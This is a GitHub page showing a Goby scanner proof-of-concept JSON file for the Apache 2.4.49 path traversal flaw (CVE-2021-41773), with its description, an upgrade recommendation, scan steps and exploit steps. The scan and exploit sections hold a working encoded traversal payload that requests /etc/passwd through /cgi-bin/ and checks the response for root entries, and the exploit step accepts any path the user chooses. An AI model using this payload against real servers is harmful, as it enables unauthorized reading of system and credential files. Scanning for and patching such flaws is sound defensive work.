-
Notifications
You must be signed in to change notification settings - Fork 197
/
Apache_2.4.49_Path_Traversal_CVE_2021_41773.json
98 lines (98 loc) · 4.17 KB
/
Apache_2.4.49_Path_Traversal_CVE_2021_41773.json
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
{
"Name": "Apache 2.4.49 Path Traversal (CVE-2021-41773)",
"Level": "2",
"Tags": [
"fileread"
],
"GobyQuery": "product=\"Apache-Web-Server\"",
"Description": "An attacker can use a path-walking attack to map urls to files other than the intended document root. If files outside the document root are not protected by 'require all denied', then attackers can access them ",
"Product": "Apache/2.4.49",
"Homepage": "https://httpd.apache.org",
"Author": "[email protected]",
"Impact": "<p>An attacker can use a path-walking attack to map urls to files other than the intended document root. If files outside the document root are not protected by 'require all denied', then attackers can access them <br></p>",
"Recommendation": "<p>Users can protect themselves by upgrading to version 2.4.50. It should be noted that the researchers report that \"request all denial\" (denying access to all requests) is the default setting for securing documents outside of the Web root directory -- which alleviates this problem. <br></p>",
"References": [
"https://mp.weixin.qq.com/s?src=11×tamp=1633533436&ver=3358&signature=2WIeZ*MU*D90aNdj2wmW55th5WWecksL2I8I8u2J*jnnq17UCiSkdje1JJGlIqGfzv61pmOfWG7lpRv7rkX1pMirxKVDViUr33H4eKZGzhSfBVtKdXAWV3a5prZoIvq-&new=1"
],
"HasExp": true,
"ExpParams": [
{
"Name": "path",
"Type": "input",
"Value": "/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd"
}
],
"ExpTips": {
"Type": "",
"Content": ""
},
"ScanSteps": [
"AND",
{
"Request": {
"method": "GET",
"uri": "/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd",
"follow_redirect": true,
"header": null,
"data_type": "text",
"data": "",
"set_variable": []
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "regex",
"value": "root:[x*]?:0:0:",
"bz": ""
}
]
},
"SetVariable": [
"output|lastbody|regex|"
]
}
],
"ExploitSteps": [
"AND",
{
"Request": {
"method": "GET",
"uri": "{{{path}}}",
"follow_redirect": true,
"header": null,
"data_type": "text",
"data": "",
"set_variable": []
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
}
]
},
"SetVariable": [
"output|lastbody||undefined"
]
}
],
"PostTime": "2021-10-06 23:35:03",
"GobyVersion": "1.8.301"
}